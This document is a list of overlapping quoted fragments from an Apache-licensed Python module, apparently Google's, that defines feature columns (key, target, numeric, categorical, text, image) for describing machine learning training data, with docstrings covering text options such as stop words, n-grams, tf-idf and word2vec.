default: Default value for the column. Returns: An instance of ImageFeatureColumn.", "sampling_percentage: Percentage value (0-100) for the number of rows that should be sampled", "etc) use_tf_idf: Boolean on whether the BOW representation should be tf*idf normalize: Boolean", "sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name,", "stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates", "_features import FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn from _features", "a feature.. Args: name: name of image feature default: Default value for the", "_features import NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn from _predict", "default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates", "from _predict import FeatureProducer from _registries import register_analyzer from _registries import register_transformer from", "bigrams etc) use_tf_idf: Boolean on whether the BOW representation should be tf*idf normalize:", "name: Name of feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name)", "for the column. sampling_percentage: Percentage value (0-100) for the number of rows that", "words/ngrams are not added to the vocab. Returns: An instance of TextFeatureColumn. \"\"\"", "instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100,", "stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed", "Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version", "processing removable_tags: list of html tags whose text should be ignored word2vec_dict: Dictionary", "file except in compliance with the License. # You may obtain a copy", "html tags whose text should be ignored word2vec_dict: Dictionary of word -> word_vectors.", "r'\\w{1,}' to group alphanumerical characters of len 1. - Use r'\\w{3,}' to group", "before processing removable_tags: list of html tags whose text should be ignored word2vec_dict:", "import register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates", "for the specific language governing permissions and # limitations under the License. \"\"\"Classes", "list or set, specifying the stop words to be ignored or a string", "prediction and evaluation is described in terms of features. This module provides functionality", "_features import KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn from _features", "a string representing the language of stopwords to be requested from nltk. Use", "the vocab. Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage,", "License for the specific language governing permissions and # limitations under the License.", "value for the column. log_base: Base of logarithm to be applied. Returns: An", "L2 norm) strip_html: Boolean on whether html_markup should be removed before processing removable_tags:", "frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within a feature.. Args: name:", "feature representing the target label or value of the instance. Args: name: Name", "\"\"\"Classes for defining the data used to train machine learning models. Data to", "to in writing, software # distributed under the License is distributed on an", "the number of rows that should be sampled for constructing the vocabulary/ngrams. split_regex:", "whether html_markup should be removed before processing removable_tags: list of html tags whose", "numeric column within a feature. Args: name: Name of feature column. default: Default", "under the License. \"\"\"Classes for defining the data used to train machine learning", "implied. # See the License for the specific language governing permissions and #", "KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target label or value of", "\"License\"); # you may not use this file except in compliance with the", "of stopwords to be requested from nltk. Use [] for no stopwords. For", "Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\");", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "from _registries import register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter from", "module provides functionality to define those features, and data transformations to apply to", "free-form text value column within a feature. Args: name: Name of feature column.", "on whether the BOW representation should be tf*idf normalize: Boolean on whether sparse", "those features, and data transformations to apply to produce those features. \"\"\" from", "Boolean on whether text should be stemmed ngrams: number of ngrams the tokenizer", "added to the vocab. Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name,", "whether text should be stemmed ngrams: number of ngrams the tokenizer should generate", "not added to the vocab. split_regex: Regex rule to extract the column value.", "(used with L2 norm) strip_html: Boolean on whether html_markup should be removed before", "NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a", "_registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name):", "or implied. # See the License for the specific language governing permissions and", "stopwords to be requested from nltk. Use [] for no stopwords. For more", "be replaced with a matrix, one row for each word frequency_threshold: Frequency threshold", "stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text", "Defaults to None, which means no splitting. Examples: - Use r'\\w{1,}' to group", "\"\"\"Creates an image column within a feature.. Args: name: name of image feature", "provides functionality to define those features, and data transformations to apply to produce", "Apache License, Version 2.0 (the \"License\"); # you may not use this file", "a numeric column within a feature. Args: name: Name of feature column. default:", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn from _features import FeatureFormat", "Name of feature column. default: Default value for the column. sampling_percentage: Percentage value", "word2vec_dict: Dictionary of word -> word_vectors. If it is not empty, then the", "NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer", "language of stopwords to be requested from nltk. Use [] for no stopwords.", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "in writing, software # distributed under the License is distributed on an \"AS", "feature column. default: Default value for the column. log_base: Base of logarithm to", "normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within", "# See the License for the specific language governing permissions and # limitations", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags,", "value (0-100) for the number of rows that should be sampled for constructing", "or value of the instance. Args: name: Name of feature column. Returns: An", "normalize: Boolean on whether sparse vector (BOW or tf*idf) should be normalize (used", "import FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn from _features import", "the BOW representation should be tf*idf normalize: Boolean on whether sparse vector (BOW", "numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a feature. Args: name: Name", "default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def", "Feature from _features import FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata", "replaced with a matrix, one row for each word frequency_threshold: Frequency threshold below", "Use [] for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether", "of rows that should be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule", "the Apache License, Version 2.0 (the \"License\"); # you may not use this", "should be stemmed ngrams: number of ngrams the tokenizer should generate (2 for", "word_vectors. If it is not empty, then the words will be replaced with", "Boolean on whether the BOW representation should be tf*idf normalize: Boolean on whether", "you may not use this file except in compliance with the License. #", "import register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms import", "from _features import NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn from", "a feature representing the key of the instance. Args: name: Name of feature", "on whether text should be stemmed ngrams: number of ngrams the tokenizer should", "Name of feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def", "default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column within a feature.", "the instance. Args: name: Name of feature column. Returns: An instance of KeyFeatureColumn.", "to group alphanumerical characters of len 3. - Use r'\\S+' to group on", "column. sampling_percentage: Percentage value (0-100) for the number of rows that should be", "from _features import CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn from", "which words/ngrams are not added to the vocab. Returns: An instance of TextFeatureColumn.", "representation should be tf*idf normalize: Boolean on whether sparse vector (BOW or tf*idf)", "of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}',", "name: name of image feature default: Default value for the column. Returns: An", "return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a feature.", "use this file except in compliance with the License. # You may obtain", "Data to be used in training, prediction and evaluation is described in terms", "instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric", "word frequency_threshold: Frequency threshold below which words/ngrams are not added to the vocab.", "KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn from _features import TextFeatureColumn", "ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn from _features import TargetFeatureColumn", "should be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to split text", "alphanumerical characters of len 1. - Use r'\\w{3,}' to group alphanumerical characters of", "list of html tags whose text should be ignored word2vec_dict: Dictionary of word", "# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may", "a matrix, one row for each word frequency_threshold: Frequency threshold below which words/ngrams", "from _registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def", "instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None):", "_transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a feature representing", "\"\"\"Creates a numeric column within a feature. Args: name: Name of feature column.", "apply to produce those features. \"\"\" from _features import CategoricalFeatureColumn from _features import", "column within a feature.. Args: name: name of image feature default: Default value", "CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False,", "html_markup should be removed before processing removable_tags: list of html tags whose text", "Percentage value (0-100) for the number of rows that should be sampled for", "2.0 (the \"License\"); # you may not use this file except in compliance", "the key of the instance. Args: name: Name of feature column. Returns: An", "return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target label or value", "of len 1. - Use r'\\w{3,}' to group alphanumerical characters of len 3.", "- Use r'\\S+' to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\"", "to split text stop_words: Either list or set, specifying the stop words to", "Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words,", "tf*idf) should be normalize (used with L2 norm) strip_html: Boolean on whether html_markup", "Boolean on whether html_markup should be removed before processing removable_tags: list of html", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "import FeatureVector def key(name): \"\"\"Creates a feature representing the key of the instance.", "the words will be replaced with a matrix, one row for each word", "use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value", "representing the language of stopwords to be requested from nltk. Use [] for", "logarithm to be applied. Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default,", "from _features import TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer from", "register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms import FeatureVector", "means no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters of len", "of feature column. default: Default value for the column. frequency_threshold: Frequency threshold below", "Regex rule to split text stop_words: Either list or set, specifying the stop", "the column. log_base: Base of logarithm to be applied. Returns: An instance of", "Default value for the column. sampling_percentage: Percentage value (0-100) for the number of", "# # Unless required by applicable law or agreed to in writing, software", "training, prediction and evaluation is described in terms of features. This module provides", "on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex)", "to be ignored or a string representing the language of stopwords to be", "express or implied. # See the License for the specific language governing permissions", "for each word frequency_threshold: Frequency threshold below which words/ngrams are not added to", "more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed ngrams: number", "below which words/ngrams are not added to the vocab. Returns: An instance of", "value column within a feature. Args: name: Name of feature column. default: Default", "text stop_words: Either list or set, specifying the stop words to be ignored", "rule to split text stop_words: Either list or set, specifying the stop words", "string representing the language of stopwords to be requested from nltk. Use []", "from nltk. Use [] for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean", "feature.. Args: name: name of image feature default: Default value for the column.", "words will be replaced with a matrix, one row for each word frequency_threshold:", "either express or implied. # See the License for the specific language governing", "vocab. Returns: An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex,", "\"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html,", "applied. Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name,", "Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams,", "NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete", "vector (BOW or tf*idf) should be normalize (used with L2 norm) strip_html: Boolean", "to define those features, and data transformations to apply to produce those features.", "is not empty, then the words will be replaced with a matrix, one", "be normalize (used with L2 norm) strip_html: Boolean on whether html_markup should be", "split_regex=None): r\"\"\"Creates a categorical or discrete value column within a feature. Args: name:", "word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within a feature.. Args:", "info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should be stemmed ngrams: number of", "from _features import ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn from", "threshold below which words are not added to the vocab. split_regex: Regex rule", "the License. # You may obtain a copy of the License at #", "strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column within a", "with L2 norm) strip_html: Boolean on whether html_markup should be removed before processing", "features. \"\"\" from _features import CategoricalFeatureColumn from _features import Feature from _features import", "feature column. default: Default value for the column. frequency_threshold: Frequency threshold below which", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "from _features import Feature from _features import FeatureColumn from _features import FeatureFormat from", "None, which means no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters", "Use r'\\S+' to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return", "import FeatureProducer from _registries import register_analyzer from _registries import register_transformer from _transforms import", "permissions and # limitations under the License. \"\"\"Classes for defining the data used", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "for the column. log_base: Base of logarithm to be applied. Returns: An instance", "text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None, frequency_threshold=0):", "to None, which means no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical", "will be replaced with a matrix, one row for each word frequency_threshold: Frequency", "log_base: Base of logarithm to be applied. Returns: An instance of NumericFeatureColumn. \"\"\"", "the column. sampling_percentage: Percentage value (0-100) for the number of rows that should", "Examples: - Use r'\\w{1,}' to group alphanumerical characters of len 1. - Use", "and # limitations under the License. \"\"\"Classes for defining the data used to", "_features import ImageFeatureColumn from _features import KeyFeatureColumn from _features import NumericFeatureColumn from _features", "the language of stopwords to be requested from nltk. Use [] for no", "discrete value column within a feature. Args: name: Name of feature column. default:", "from _transforms import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a feature", "import FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn from _features import", "name: Name of feature column. default: Default value for the column. log_base: Base", "import ExampleProtoFormatter from _transforms import FeatureVector def key(name): \"\"\"Creates a feature representing the", "of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column", "with the License. # You may obtain a copy of the License at", "Args: name: Name of feature column. Returns: An instance of KeyFeatureColumn. \"\"\" return", "def key(name): \"\"\"Creates a feature representing the key of the instance. Args: name:", "below which words are not added to the vocab. split_regex: Regex rule to", "be requested from nltk. Use [] for no stopwords. For more info nltk.corpus.stopwords.readme()", "for defining the data used to train machine learning models. Data to be", "# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you", "group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold,", "vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either list or set, specifying", "limitations under the License. \"\"\"Classes for defining the data used to train machine", "non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def", "TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize,", "3. - Use r'\\S+' to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn.", "stop_words: Either list or set, specifying the stop words to be ignored or", "KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target label", "law or agreed to in writing, software # distributed under the License is", "the License for the specific language governing permissions and # limitations under the", "TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a feature. Args:", "are not added to the vocab. split_regex: Regex rule to extract the column", "be ignored or a string representing the language of stopwords to be requested", "from _features import FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn from", "or set, specifying the stop words to be ignored or a string representing", "_registries import register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter from _transforms", "len 1. - Use r'\\w{3,}' to group alphanumerical characters of len 3. -", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "features, and data transformations to apply to produce those features. \"\"\" from _features", "Name of feature column. default: Default value for the column. log_base: Base of", "from _features import FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata from", "machine learning models. Data to be used in training, prediction and evaluation is", "image(name, default=None): \"\"\"Creates an image column within a feature.. Args: name: name of", "An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5,", "_transforms import FeatureVector def key(name): \"\"\"Creates a feature representing the key of the", "of len 3. - Use r'\\S+' to group on non-whitespace. Returns: An instance", "column. default: Default value for the column. sampling_percentage: Percentage value (0-100) for the", "value for the column. frequency_threshold: Frequency threshold below which words are not added", "def target(name='target'): \"\"\"Creates a feature representing the target label or value of the", "CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name, default=default, frequency_threshold=frequency_threshold, split_regex=split_regex) def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english',", "-> word_vectors. If it is not empty, then the words will be replaced", "of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf,", "def text(name, default=None, sampling_percentage=100, split_regex=r'\\w{3,}', stop_words='english', use_stemmer=False, ngrams=1, use_tf_idf=False, normalize=False, strip_html=False, removable_tags=None, word2vec_dict=None,", "value of the instance. Args: name: Name of feature column. Returns: An instance", "Reserved. # # Licensed under the Apache License, Version 2.0 (the \"License\"); #", "in compliance with the License. # You may obtain a copy of the", "are not added to the vocab. Returns: An instance of TextFeatureColumn. \"\"\" return", "Frequency threshold below which words are not added to the vocab. split_regex: Regex", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "requested from nltk. Use [] for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer:", "to train machine learning models. Data to be used in training, prediction and", "of the instance. Args: name: Name of feature column. Returns: An instance of", "to be used in training, prediction and evaluation is described in terms of", "\"\"\"Creates a free-form text value column within a feature. Args: name: Name of", "train machine learning models. Data to be used in training, prediction and evaluation", "See the License for the specific language governing permissions and # limitations under", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "functionality to define those features, and data transformations to apply to produce those", "If it is not empty, then the words will be replaced with a", "name: Name of feature column. default: Default value for the column. frequency_threshold: Frequency", "instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the", "which words are not added to the vocab. split_regex: Regex rule to extract", "column. default: Default value for the column. log_base: Base of logarithm to be", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "r'\\S+' to group on non-whitespace. Returns: An instance of CategoricalFeatureColumn. \"\"\" return CategoricalFeatureColumn(name,", "for constructing the vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either list", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "Frequency threshold below which words/ngrams are not added to the vocab. Returns: An", "generate (2 for bigrams etc) use_tf_idf: Boolean on whether the BOW representation should", "FeatureProducer from _registries import register_analyzer from _registries import register_transformer from _transforms import ExampleProtoFormatter", "within a feature.. Args: name: name of image feature default: Default value for", "representing the target label or value of the instance. Args: name: Name of", "of ngrams the tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean on", "from _features import TargetFeatureColumn from _features import TextFeatureColumn from _predict import FeatureProducer from", "for the number of rows that should be sampled for constructing the vocabulary/ngrams.", "FeatureColumn from _features import FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn", "number of rows that should be sampled for constructing the vocabulary/ngrams. split_regex: Regex", "removed before processing removable_tags: list of html tags whose text should be ignored", "specifying the stop words to be ignored or a string representing the language", "TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within", "rows that should be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to", "word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within a feature. Args: name:", "def image(name, default=None): \"\"\"Creates an image column within a feature.. Args: name: name", "an image column within a feature.. Args: name: name of image feature default:", "Args: name: Name of feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return", "Version 2.0 (the \"License\"); # you may not use this file except in", "An instance of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing", "except in compliance with the License. # You may obtain a copy of", "import CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn from _features import", "_predict import FeatureProducer from _registries import register_analyzer from _registries import register_transformer from _transforms", "removable_tags=None, word2vec_dict=None, frequency_threshold=0): \"\"\"Creates a free-form text value column within a feature. Args:", "An instance of TextFeatureColumn. \"\"\" return TextFeatureColumn( name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer,", "Regex rule to extract the column value. Defaults to None, which means no", "_features import TextFeatureColumn from _predict import FeatureProducer from _registries import register_analyzer from _registries", "one row for each word frequency_threshold: Frequency threshold below which words/ngrams are not", "column value. Defaults to None, which means no splitting. Examples: - Use r'\\w{1,}'", "sparse vector (BOW or tf*idf) should be normalize (used with L2 norm) strip_html:", "of word -> word_vectors. If it is not empty, then the words will", "of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates", "Args: name: Name of feature column. default: Default value for the column. frequency_threshold:", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "be sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to split text stop_words:", "r'\\w{3,}' to group alphanumerical characters of len 3. - Use r'\\S+' to group", "categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column within a", "of KeyFeatureColumn. \"\"\" return KeyFeatureColumn(name) def target(name='target'): \"\"\"Creates a feature representing the target", "name: Name of feature column. default: Default value for the column. sampling_percentage: Percentage", "value for the column. Returns: An instance of ImageFeatureColumn. \"\"\" return ImageFeatureColumn(name, default=default)", "be removed before processing removable_tags: list of html tags whose text should be", "name: Name of feature column. Returns: An instance of TargetFeatureColumn. \"\"\" return TargetFeatureColumn(name)", "the vocab. split_regex: Regex rule to extract the column value. Defaults to None,", "used in training, prediction and evaluation is described in terms of features. This", "_features import CategoricalFeatureColumn from _features import Feature from _features import FeatureColumn from _features", "tf*idf normalize: Boolean on whether sparse vector (BOW or tf*idf) should be normalize", "1. - Use r'\\w{3,}' to group alphanumerical characters of len 3. - Use", "group alphanumerical characters of len 3. - Use r'\\S+' to group on non-whitespace.", "word -> word_vectors. If it is not empty, then the words will be", "value for the column. sampling_percentage: Percentage value (0-100) for the number of rows", "extract the column value. Defaults to None, which means no splitting. Examples: -", "column. log_base: Base of logarithm to be applied. Returns: An instance of NumericFeatureColumn.", "to be applied. Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base)", "transformations to apply to produce those features. \"\"\" from _features import CategoricalFeatureColumn from", "instance. Args: name: Name of feature column. Returns: An instance of TargetFeatureColumn. \"\"\"", "Args: name: Name of feature column. default: Default value for the column. sampling_percentage:", "to extract the column value. Defaults to None, which means no splitting. Examples:", "for no stopwords. For more info nltk.corpus.stopwords.readme() use_stemmer: Boolean on whether text should", "(0-100) for the number of rows that should be sampled for constructing the", "default=None, log_base=0): \"\"\"Creates a numeric column within a feature. Args: name: Name of", "on whether html_markup should be removed before processing removable_tags: list of html tags", "of features. This module provides functionality to define those features, and data transformations", "in terms of features. This module provides functionality to define those features, and", "number of ngrams the tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean", "split_regex: Regex rule to extract the column value. Defaults to None, which means", "use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an image column", "log_base=log_base) def categorical(name, default=None, frequency_threshold=5, split_regex=None): r\"\"\"Creates a categorical or discrete value column", "ngrams the tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean on whether", "FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn from _features import KeyFeatureColumn", "from _features import FeatureFormat from _features import FeatureMetadata from _features import ImageFeatureColumn from", "use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold) def image(name, default=None): \"\"\"Creates an", "name, default=default, sampling_percentage=sampling_percentage, split_regex=split_regex, stop_words=stop_words, use_stemmer=use_stemmer, ngrams=ngrams, use_tf_idf=use_tf_idf, normalize=normalize, strip_html=strip_html, removable_tags=removable_tags, word2vec_dict=word2vec_dict, frequency_threshold=frequency_threshold)", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "_features import Feature from _features import FeatureColumn from _features import FeatureFormat from _features", "which means no splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters of", "to group alphanumerical characters of len 1. - Use r'\\w{3,}' to group alphanumerical", "\"\"\" return TargetFeatureColumn(name) def numeric(name, default=None, log_base=0): \"\"\"Creates a numeric column within a", "whether sparse vector (BOW or tf*idf) should be normalize (used with L2 norm)", "tokenizer should generate (2 for bigrams etc) use_tf_idf: Boolean on whether the BOW", "sampled for constructing the vocabulary/ngrams. split_regex: Regex rule to split text stop_words: Either", "terms of features. This module provides functionality to define those features, and data", "be applied. Returns: An instance of NumericFeatureColumn. \"\"\" return NumericFeatureColumn(name, default=default, log_base=log_base) def", "words are not added to the vocab. split_regex: Regex rule to extract the", "target label or value of the instance. Args: name: Name of feature column.", "ignored word2vec_dict: Dictionary of word -> word_vectors. If it is not empty, then", "splitting. Examples: - Use r'\\w{1,}' to group alphanumerical characters of len 1. -", "Base of logarithm to be applied. Returns: An instance of NumericFeatureColumn. \"\"\" return", "Default value for the column. log_base: Base of logarithm to be applied. Returns:", "categorical or discrete value column within a feature. Args: 